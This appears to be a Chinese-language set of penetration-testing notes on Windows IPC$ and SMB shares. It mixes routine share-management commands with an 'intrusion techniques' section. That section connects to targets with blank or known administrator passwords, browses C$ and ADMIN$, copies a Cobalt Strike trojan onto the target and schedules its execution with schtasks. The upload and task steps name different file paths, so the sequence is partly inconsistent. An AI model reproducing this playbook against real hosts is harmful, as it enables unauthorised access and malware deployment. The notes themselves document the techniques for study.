IPC$(Internet Process Connection)是共享”命名管道”的资源，它是为了让进程间通信而开放的命名管道，可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用；
IPC$本质是一段共享的内存。
windows的IPC连接的协议为SMB协议。


windows查看本机的IPC$资源(即本机开启共享的资源)：
net share


IPC$是一个特殊的共享资源。一般能做的事情很有限。



SMB可以基于NBT实现，也可直接通过445端口实现。

IPC$利用条件：
1. 139端口开放：是netbios协议的应用需要。
2. 445端口开放：SMB远程共享协议。
3. 管理员开启了共享。
4. 一般都需要账号密码验证才能访问。


NBT协议：
137(UDP)、138(UDP)、139(TCP)端口一般开放。


通过nbt协议(一般需开放139端口)查看主机192.168.43.39的NETBIOS主机名等信息(自己本机也需开启)：
nbtstat -A 192.168.43.39

查看已建立的IPC$连接：
net use


net use * /delete   //删除所有的已建立的网络映射或共享
或 net use * /del /y

IPC$的读写权限与其对应共享的设置用户权限相同。

常用入侵手法：
1.若目标开启了IPC$连接，且对应密码为空，则直接使用空密码建立连接：其实普通用户也行。
net use "\\192.168.88.134\IPC$"    /u:"administrator"  ""
成功建立IPC$连接后能执行的命令：如：
查看对应共享资源，如：
dir  "\\192.168.88.134\C$"
dir  "\\192.168.88.134\ADMIN$"
dir  "\\192.168.88.134\C$\Users\"

2.若目标开启了IPC$连接，且知道密码，则直接使用对应密码建立连接：
net use "\\192.168.88.134\IPC$"    /u:"administrator"  "123qwe"
dir  "\\192.168.88.134\C$"
dir  "\\192.168.88.134\testq"
dir  "\\192.168.88.134\C$\Users\"
查看主机192.168.88.134的共享资源(需成功建立IPC$连接后)：
net view  "\\192.168.88.134"

3.若目标开启了IPC$连接，且目标系统为低版本(win7及以下)，则直接建立IPC空连接：
net use  "\\192.168.43.39\IPC$"    /u:""  ""
IPC空连接几乎没什么用。




IPC$认证成功后，上传文件：
at计划任务上线仅适用于低版本(如：win2003及以下，win7).
高版本使用schtasks计划任务命令上线(如win10).



xcopy(相对于copy)命令能复制文件夹。


场景1：通过计划任务上传cs木马执行上线：


上传木马：
copy doozr.exe \\192.168.88.134\c$\wknz.exe

查看对应目标机器上的当前时间(需先成功建立IPC$连接)：
net time "\\192.168.88.134"


创建计划任务：
schtasks /create /TN cs /TR C:\win.exe /SC once /ST 19:35

查看名为cs的计划任务
schtasks /query /TN cs




远程查看192.168.88.134主机的进程：
tasklist /S 192.168.88.134 /U administrator -P 123qwe







windows共享资源或文件夹：只需要对方经过认证就能访问。
开启共享：通过右键文件夹或盘符设置即可。

访问共享：在文件夹上输入\\192.168.43.105\c	即可访问对方的c盘资源。
常用：
文件夹上输入\\192.168.43.105\		即可看到所有有权限访问的共享资源


命令行模式：
C:\Users\z>net use \\192.168.43.105\C$ /u:administrator saldlwd
最后一个参数是密码。即使用administrator用户，密码为saldlwd  访问192.168.43.105目标的共享目录 C盘。


net use命令：常用于共享文件夹什么的。

net use		//查看已经建立的网络映射
net use * /delete	//删除所有的已建立的网络映射或共享
或 net use * /del /y

C:\Users\z>net use  "\\192.168.43.105\c"(即远程地址) /del	//删除特定映射

带上双引号，常用。
C:\Users\z>net use  "\\192.168.43.105\c" /u:"administrator"  "123456"	//建立特定连接
或
C:\Users\z>net use "\\192.168.43.105"   /u:"administrator" "123456"		//最常用。
地址	用户名	密码
此法会列出目标地址上所有的共享(默认连接为IPC$)，建议都用双引号。

net view "\\192.168.43.16"			//查看192.168.43.16远程主机的共享资源
net share					//查看本机共享资源


nbtstat -A 192.168.43.16			 //显示远程主机名和域名列表
net user 					//查看本地主机用户列表
net time "\\192.168.43.16"			//查看目标主机当前时间
net use z: "\\192.168.43.16\abc"		//将目标主机的abc共享资源映射到本地的z盘，然后在本地网络位置就能看到。

net use z: /del /y				//删除映射的z盘

copy 本地文件路径 \\IP\共享目录名		//把本地文件复制到目标主机的共享目录
eg：
C:\Users\z>copy "D:\q.txt"  "\\192.168.43.182\C\pezasd"
将本地的q.txt复制到远程ip共享的C盘下的pezasd文件夹下。

net use "\\192.168.43.16"  "" /u:""		
//与192.168.43.16主机建立空连接，即对方设置允许空用户名、空密码建立连接。

